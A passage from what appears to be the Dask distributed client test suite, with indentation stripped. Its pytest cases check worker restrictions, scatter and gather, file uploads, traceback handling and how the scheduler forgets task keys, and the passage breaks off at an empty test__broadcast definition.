workers = {d: a.address for d in all_tasks}
result = c.compute(last_task, workers=workers)
await result
# all tasks should have been calculated by the first worker
for task in tasks:
assert s.worker_restrictions[task.key] == {a.address}
# and the data should also be there
assert last_task.key in a.data
assert last_task.key not in b.data
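# NOTE: `workers=` accepts either a set of addresses/hosts applied to every
# submitted key, or (as above) a dict mapping individual task keys to the
# worker(s) allowed to run them; the scheduler records these in
# s.worker_restrictions / s.host_restrictions.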
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_map(c, s, a, b):
L = c.map(inc, range(5), workers={a.ip})
await wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.host_restrictions[x.key] == {a.ip}
L = c.map(inc, [10, 11, 12], workers=[{a.ip}, {a.ip, b.ip}, {b.ip}])
await wait(L)
assert s.host_restrictions[L[0].key] == {a.ip}
assert s.host_restrictions[L[1].key] == {a.ip, b.ip}
assert s.host_restrictions[L[2].key] == {b.ip}
with pytest.raises(ValueError):
c.map(inc, [10, 11, 12], workers=[{a.ip}])
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_get(c, s, a, b):
dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
restrictions = {"y": {a.ip}, "z": {b.ip}}
futures = c.get(dsk, ["y", "z"], restrictions, sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert "y" in a.data
assert "z" in b.data
@gen_cluster(client=True)
async def dont_test_bad_restrictions_raise_exception(c, s, a, b):
z = c.submit(inc, 2, workers={"bad-address"})
try:
await z
assert False
except ValueError as e:
assert "bad-address" in str(e)
assert z.key in str(e)
@gen_cluster(client=True, timeout=None)
async def test_remove_worker(c, s, a, b):
L = c.map(inc, range(20))
await wait(L)
await b.close()
assert b.address not in s.workers
result = await c.gather(L)
assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_errors_dont_block(c, s, w):
L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
start = time()
while not (L[0].status == L[2].status == "finished"):
assert time() < start + 5
await asyncio.sleep(0.01)
result = await c.gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(client=True)
async def test_submit_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = c.submit(assert_list, [1, 2, 3])
result = await x
assert result
x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = await x
assert result
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(assert_list, [x, y])
result = await z
assert result
@gen_cluster(client=True)
async def test_map_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = c.map(assert_list, [[1, 2, 3], [4]])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = await c.gather(L)
assert all(result)
@gen_cluster()
async def test_two_consecutive_clients_share_results(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(random.randint, 0, 1000, pure=True)
xx = await x
f = await Client(s.address, asynchronous=True)
y = f.submit(random.randint, 0, 1000, pure=True)
yy = await y
assert xx == yy
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_submit_then_get_with_Future(c, s, a, b):
x = c.submit(slowinc, 1)
dsk = {"y": (inc, x)}
result = await c.get(dsk, "y", sync=False)
assert result == 3
@gen_cluster(client=True)
async def test_aliases(c, s, a, b):
x = c.submit(inc, 1)
dsk = {"y": x}
result = await c.get(dsk, "y", sync=False)
assert result == 2
@gen_cluster(client=True)
async def test_aliases_2(c, s, a, b):
dsk_keys = [
({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
({"x": "y", "y": 1}, ["x"]),
({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
]
for dsk, keys in dsk_keys:
result = await c.gather(c.get(dsk, keys, sync=False))
assert list(result) == list(dask.get(dsk, keys))
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_scatter(c, s, a, b):
d = await c.scatter({"y": 20})
assert isinstance(d["y"], Future)
assert a.data.get("y") == 20 or b.data.get("y") == 20
y_who_has = s.get_who_has(keys=["y"])["y"]
assert a.address in y_who_has or b.address in y_who_has
assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
yy = await c.gather([d["y"]])
assert yy == [20]
[x] = await c.scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = await c.gather([x])
x_who_has = s.get_who_has(keys=[x.key])[x.key]
assert s.tasks[x.key].who_has
assert (
s.workers[a.address] in s.tasks[x.key].who_has
or s.workers[b.address] in s.tasks[x.key].who_has
)
assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = c.submit(add, x, d["y"]) # submit works on Future
result = await z
assert result == 10 + 20
result = await c.gather([z, x])
assert result == [30, 10]
@gen_cluster(client=True)
async def test_scatter_types(c, s, a, b):
d = await c.scatter({"x": 1})
assert isinstance(d, dict)
assert list(d) == ["x"]
for seq in [[1], (1,), {1}, frozenset([1])]:
L = await c.scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
s.validate_state()
seq = await c.scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_non_list(c, s, a, b):
x = await c.scatter(1)
assert isinstance(x, Future)
result = await x
assert result == 1
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
[a] = await c.scatter([1])
[b] = await c.scatter([1])
assert a.key == b.key
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_tokenize_local(c, s, a, b):
from dask.base import normalize_token
class MyObj:
pass
L = []
@normalize_token.register(MyObj)
def f(x):
L.append(x)
return "x"
obj = MyObj()
future = await c.scatter(obj)
assert L and L[0] is obj
@gen_cluster(client=True)
async def test_scatter_singletons(c, s, a, b):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
future = await c.scatter(x)
result = await future
assert str(result) == str(x)
@gen_cluster(client=True)
async def test_scatter_typename(c, s, a, b):
future = await c.scatter(123)
assert future.key.startswith("int")
@gen_cluster(client=True)
async def test_scatter_hash_2(c, s, a, b):
x = await c.scatter(123)
y = await c.scatter(123)
assert x.key == y.key
z = await c.scatter(123, hash=False)
assert z.key != y.key
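# NOTE: scattered data is keyed by a hash of its contents by default, so
# scattering the same value twice returns Futures with identical keys; passing
# hash=False forces a fresh, unique key instead, as the two tests above check.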
@gen_cluster(client=True)
async def test_get_releases_data(c, s, a, b):
await c.gather(c.get({"x": (inc, 1)}, ["x"], sync=False))
import gc
gc.collect()
start = time()
while c.refcount["x"]:
await asyncio.sleep(0.01)
assert time() < start + 2
def test_current(s, a, b):
with Client(s["address"]) as c:
assert Client.current() is c
with pytest.raises(ValueError):
Client.current()
with Client(s["address"]) as c:
assert Client.current() is c
def test_global_clients(loop):
assert _get_global_client() is None
with pytest.raises(ValueError):
default_client()
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert _get_global_client() is c
assert default_client() is c
with Client(s["address"], loop=loop) as f:
assert _get_global_client() is f
assert default_client() is f
assert default_client(c) is c
assert default_client(f) is f
assert _get_global_client() is None
@gen_cluster(client=True)
async def test_exception_on_exception(c, s, a, b):
x = c.submit(lambda: 1 / 0)
y = c.submit(inc, x)
with pytest.raises(ZeroDivisionError):
await y
z = c.submit(inc, y)
with pytest.raises(ZeroDivisionError):
await z
@gen_cluster(client=True)
async def test_get_nbytes(c, s, a, b):
[x] = await c.scatter([1])
assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
y = c.submit(inc, x)
await y
assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_nbytes_determines_worker(c, s, a, b):
x = c.submit(identity, 1, workers=[a.ip])
y = c.submit(identity, tuple(range(100)), workers=[b.ip])
await c.gather([x, y])
z = c.submit(lambda x, y: None, x, y)
await z
assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
async def test_if_intermediates_clear_on_error(c, s, a, b):
x = delayed(div, pure=True)(1, 0)
y = delayed(div, pure=True)(1, 2)
z = delayed(add, pure=True)(x, y)
f = c.compute(z)
with pytest.raises(ZeroDivisionError):
await f
s.validate_state()
assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(
client=True, config={"distributed.scheduler.default-task-durations": {"f": "1ms"}}
)
async def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
np = pytest.importorskip("numpy")
lists = c.map(np.ones, [10000] * 10, pure=False)
sums = c.map(np.sum, lists)
total = c.submit(sum, sums)
def f(x, y):
return None
results = c.map(f, lists, [total] * 10)
await wait([total])
await wait(results)
assert (
sum(
s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
for l, r in zip(lists, results)
)
>= 9
)
@gen_cluster(client=True)
async def test_get_with_non_list_key(c, s, a, b):
dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
x = await c.get(dsk, ("x", 0), sync=False)
y = await c.get(dsk, 5, sync=False)
assert x == 2
assert y == 3
@gen_cluster(client=True)
async def test_get_with_error(c, s, a, b):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
await c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
c.get(dsk, "y")
@gen_cluster(client=True)
async def test_directed_scatter(c, s, a, b):
await c.scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
await c.scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
futures = c.scatter([1, 2, 3], workers=[b["address"]])
has_what = sync(loop, c.scheduler.has_what)
assert len(has_what[b["address"]]) == len(futures)
assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
async def test_scatter_direct(c, s, a, b):
future = await c.scatter(123, direct=True)
assert future.key in a.data or future.key in b.data
assert s.tasks[future.key].who_has
assert future.status == "finished"
result = await future
assert result == 123
assert not s.counters["op"].components[0]["scatter"]
result = await future
assert not s.counters["op"].components[0]["gather"]
result = await c.gather(future)
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_scatter_direct_numpy(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.ones(5)
future = await c.scatter(x, direct=True)
result = await future
assert np.allclose(x, result)
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
async def test_scatter_direct_broadcast(c, s, a, b):
future2 = await c.scatter(456, direct=True, broadcast=True)
assert future2.key in a.data
assert future2.key in b.data
assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
result = await future2
assert result == 456
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_balanced(c, s, *workers):
futures = await c.scatter([1, 2, 3], direct=True)
assert sorted([len(w.data) for w in workers]) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_broadcast_target(c, s, *workers):
futures = await c.scatter([123, 456], direct=True, workers=workers[0].address)
assert futures[0].key in workers[0].data
assert futures[1].key in workers[0].data
futures = await c.scatter(
[123, 456],
direct=True,
broadcast=True,
workers=[w.address for w in workers[:3]],
)
assert all(
f.key in w.data and s.workers[w.address] in s.tasks[f.key].who_has
for f in futures
for w in workers[:3]
)
@gen_cluster(client=True, nthreads=[])
async def test_scatter_direct_empty(c, s):
with pytest.raises((ValueError, TimeoutError)):
await c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, timeout=None, nthreads=[("127.0.0.1", 1)] * 5)
async def test_scatter_direct_spread_evenly(c, s, *workers):
futures = []
for i in range(10):
future = await c.scatter(i, direct=True)
futures.append(future)
assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
results = c.gather(futures, direct=direct)
assert results == [1, 2, 3]
delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
async def test_gather_direct(c, s, a, b):
futures = await c.scatter([1, 2, 3])
data = await c.gather(futures, direct=True)
assert data == [1, 2, 3]
@gen_cluster(client=True)
async def test_many_submits_spread_evenly(c, s, a, b):
L = [c.submit(inc, i) for i in range(10)]
await wait(L)
assert a.data and b.data
@gen_cluster(client=True)
async def test_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
tb = await x.traceback()
assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
async def test_get_traceback(c, s, a, b):
try:
await c.get({"x": (div, 1, 0)}, "x", sync=False)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
@gen_cluster(client=True)
async def test_gather_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await c.gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
def test_traceback_sync(c):
x = c.submit(div, 1, 0)
tb = x.traceback()
assert any(
"x / y" in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
y = c.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb)))
)
z = c.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(client=True)
async def test_upload_file(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", "def f():\n return {}".format(value)) as fn:
await c.upload_file(fn)
x = c.submit(g, pure=False)
result = await x
assert result == value
@gen_cluster(client=True)
async def test_upload_file_no_extension(c, s, a, b):
with tmp_text("myfile", "") as fn:
await c.upload_file(fn)
@gen_cluster(client=True)
async def test_upload_file_zip(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
try:
for value in [123, 456]:
with tmp_text(
"myfile.py", "def f():\n return {}".format(value)
) as fn_my_file:
with zipfile.ZipFile("myfile.zip", "w") as z:
z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
await c.upload_file("myfile.zip")
x = c.submit(g, pure=False)
result = await x
assert result == value
finally:
if os.path.exists("myfile.zip"):
os.remove("myfile.zip")
@gen_cluster(client=True)
async def test_upload_file_egg(c, s, a, b):
def g():
import package_1, package_2
return package_1.a, package_2.b
# c.upload_file tells each worker to
# - put this file in their local_directory
# - modify their sys.path to include it
# we don't care about the local_directory
# but we do care about restoring the path
with save_sys_modules():
for value in [123, 456]:
with tmpfile() as dirname:
os.mkdir(dirname)
with open(os.path.join(dirname, "setup.py"), "w") as f:
f.write("from setuptools import setup, find_packages\n")
f.write(
'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
value
)
)
# test a package with an underscore in the name
package_1 = os.path.join(dirname, "package_1")
os.mkdir(package_1)
with open(os.path.join(package_1, "__init__.py"), "w") as f:
f.write("a = {}\n".format(value))
# test multiple top-level packages
package_2 = os.path.join(dirname, "package_2")
os.mkdir(package_2)
with open(os.path.join(package_2, "__init__.py"), "w") as f:
f.write("b = {}\n".format(value))
# compile these into an egg
subprocess.check_call(
[sys.executable, "setup.py", "bdist_egg"], cwd=dirname
)
egg_root = os.path.join(dirname, "dist")
# first file ending with '.egg'
egg_name = [
fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
][0]
egg_path = os.path.join(egg_root, egg_name)
await c.upload_file(egg_path)
os.remove(egg_path)
x = c.submit(g, pure=False)
result = await x
assert result == (value, value)
@gen_cluster(client=True)
async def test_upload_large_file(c, s, a, b):
assert a.local_directory
assert b.local_directory
with tmp_text("myfile", "abc") as fn:
with tmp_text("myfile2", "def") as fn2:
await c._upload_large_file(fn, remote_filename="x")
await c._upload_large_file(fn2)
for w in [a, b]:
assert os.path.exists(os.path.join(w.local_directory, "x"))
assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
with open(os.path.join(w.local_directory, "x")) as f:
assert f.read() == "abc"
with open(os.path.join(w.local_directory, "myfile2")) as f:
assert f.read() == "def"
def test_upload_file_sync(c):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
c.upload_file(fn)
x = c.submit(g)
assert x.result() == 123
@gen_cluster(client=True)
async def test_upload_file_exception(c, s, a, b):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
await c.upload_file(fn)
def test_upload_file_exception_sync(c):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
c.upload_file(fn)
@pytest.mark.skip
@gen_cluster()
async def test_multiple_clients(s, a, b):
a = await Client(s.address, asynchronous=True)
b = await Client(s.address, asynchronous=True)
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.client is a
assert y.client is b
xx = await x
yy = await y
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.client is a
zz = await z
assert zz == 5
await a.close()
await b.close()
@gen_cluster(client=True)
async def test_async_compute(c, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = c.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = await c.gather([yy, zz])
assert result == [2, 0]
assert isinstance(c.compute(y), Future)
assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
async def test_async_compute_with_scatter(c, s, a, b):
d = await c.scatter({("x", 1): 1, ("y", 1): 2})
x, y = d[("x", 1)], d[("y", 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = c.compute(z)
[result] = await c.gather([zz])
assert result == 2 + 3
def test_sync_compute(c):
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = c.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
async def test_remote_scatter_gather(c, s, a, b):
x, y, z = await c.scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(timeout=1000, client=True)
async def test_remote_submit_on_Future(c, s, a, b):
x = c.submit(lambda x: x + 1, 1)
y = c.submit(lambda x: x + 1, x)
result = await y
assert result == 3
def test_start_is_idempotent(c):
c.start()
c.start()
c.start()
x = c.submit(inc, 1)
assert x.result() == 2
@gen_cluster(client=True)
async def test_client_with_scheduler(c, s, a, b):
assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y)
result = await x
assert result == 1 + 1
result = await z
assert result == 1 + 1 + 1 + 2
A, B, C = await c.scatter([1, 2, 3])
AA, BB, xx = await c.gather([A, B, x])
assert (AA, BB, xx) == (1, 2, 2)
result = await c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
assert result == 12
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_allow_restrictions(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[b.address]
x = c.submit(inc, 1, workers=a.ip)
await x
assert s.tasks[x.key].who_has == {aws}
assert not s.loose_restrictions
x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
await x
assert s.tasks[x.key].who_has == {aws}
assert x.key in s.loose_restrictions
L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has == {aws} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
await x
assert s.tasks[x.key].who_has
assert x.key in s.loose_restrictions
L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
c.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
c.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
with pytest.raises(TypeError):
c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
@pytest.mark.skipif("True", reason="because")
def test_bad_address():
try:
Client("123.123.123.123:1234", timeout=0.1)
except (IOError, TimeoutError) as e:
assert "connect" in str(e).lower()
try:
Client("127.0.0.1:1234", timeout=0.1)
except (IOError, TimeoutError) as e:
assert "connect" in str(e).lower()
@gen_cluster(client=True)
async def test_long_error(c, s, a, b):
def bad(x):
raise ValueError("a" * 100000)
x = c.submit(bad, 10)
try:
await x
except ValueError as e:
assert len(str(e)) < 100000
tb = await x.traceback()
assert all(
len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
@gen_cluster(client=True)
async def test_map_on_futures_with_kwargs(c, s, a, b):
def f(x, y=10):
return x + y
futures = c.map(inc, range(10))
futures2 = c.map(f, futures, y=20)
results = await c.gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = c.submit(inc, 100)
future2 = c.submit(f, future, y=200)
result = await future2
assert result == 100 + 1 + 200
class BadlySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(client=True)
async def test_badly_serialized_input(c, s, a, b):
o = BadlySerializedObject()
future = c.submit(inc, o)
futures = c.map(inc, range(10))
L = await c.gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == "error"
@pytest.mark.skipif("True", reason="")
async def test_badly_serialized_input_stderr(capsys, c):
o = BadlySerializedObject()
future = c.submit(inc, o)
start = time()
while True:
sleep(0.01)
out, err = capsys.readouterr()
if "hello!" in err:
break
assert time() - start < 20
assert future.status == "error"
def test_repr(loop):
funcs = [str, repr, lambda x: x._repr_html_()]
with cluster(nworkers=3, worker_kwargs={"memory_limit": "2 GB"}) as (s, [a, b, c]):
with Client(s["address"], loop=loop) as c:
for func in funcs:
text = func(c)
assert c.scheduler.address in text
assert "3" in text
assert "6" in text
assert "GB" in text
if "<table" not in text:
assert len(text) < 80
for func in funcs:
text = func(c)
assert "not connected" in text
@gen_cluster(client=True)
async def test_repr_async(c, s, a, b):
c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
async def test_repr_no_memory_limit(c, s, a, b):
c._repr_html_()
@gen_test()
async def test_repr_localcluster():
cluster = await LocalCluster(
processes=False, dashboard_address=None, asynchronous=True
)
client = await Client(cluster, asynchronous=True)
try:
text = client._repr_html_()
assert cluster.scheduler.address in text
assert is_valid_xml(client._repr_html_())
finally:
await client.close()
await cluster.close()
@gen_cluster(client=True)
async def test_forget_simple(c, s, a, b):
x = c.submit(inc, 1, retries=2)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key not in s.tasks
assert z.key not in s.tasks
assert not s.tasks[y.key].dependents
s.client_releases_keys(keys=[y.key], client=c.id)
assert not s.tasks
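# NOTE: client_releases_keys only forgets a task once no client wants it *and* no
# retained task depends on it; above, x survives until z (its dependent) is
# released, matching the scheduler's reference counting of dependents.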
@gen_cluster(client=True)
async def test_forget_complex(e, s, A, B):
a, b, c, d = await e.scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
await wait([a, b, c, d, ab, ac, cd, acab])
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
assert b.key not in s.tasks
start = time()
while b.key in A.data or b.key in B.data:
await asyncio.sleep(0.01)
assert time() < start + 10
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
async def test_forget_in_flight(e, s, A, B):
delayed2 = partial(delayed, pure=True)
a, b, c, d = [delayed2(slowinc)(i) for i in range(4)]
ab = delayed2(slowadd)(a, b, dask_key_name="ab")
cd = delayed2(slowadd)(c, d, dask_key_name="cd")
ac = delayed2(slowadd)(a, c, dask_key_name="ac")
acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
x, y = e.compute([ac, acab])
s.validate_state()
for i in range(5):
await asyncio.sleep(0.01)
s.validate_state()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate_state()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
@gen_cluster(client=True)
async def test_forget_errors(c, s, a, b):
x = c.submit(div, 1, 0)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=c.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(c):
s = str(c)
r = repr(c)
assert c.scheduler.address in s
assert c.scheduler.address in r
assert str(2) in s # nworkers
assert "cores" in s or "threads" in s
@gen_cluster(client=True)
async def test_waiting_data(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
@gen_cluster()
async def test_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
assert set(s.client_comms) == {c.id, f.id}
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
assert s.wants_what == {
c.id: {x.key, y.key},
f.id: {y.key},
"fire-and-forget": set(),
}
assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
await c.close()
start = time()
while c.id in s.wants_what:
await asyncio.sleep(0.01)
assert time() < start + 5
assert c.id not in s.wants_what
assert c.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
await f.close()
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 2, s.tasks
def long_running_client_connection(address):
with pristine_loop():
c = Client(address)
x = c.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
@gen_cluster()
async def test_cleanup_after_broken_client_connection(s, a, b):
proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
proc.daemon = True
proc.start()
start = time()
while not s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
proc.terminate()
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
@gen_cluster()
async def test_multi_garbage_collection(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
x.__del__()
start = time()
while x.key in a.data or x.key in b.data:
await asyncio.sleep(0.01)
assert time() < start + 5
assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id, f.id}}
y.__del__()
start = time()
while x.key in s.wants_what[f.id]:
await asyncio.sleep(0.01)
assert time() < start + 5
await asyncio.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id}}
y2.__del__()
start = time()
while y.key in a.data or y.key in b.data:
await asyncio.sleep(0.01)
assert time() < start + 5
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
await c.close()
await f.close()
@gen_cluster(client=True)
async def test__broadcast(c, s, a, b):
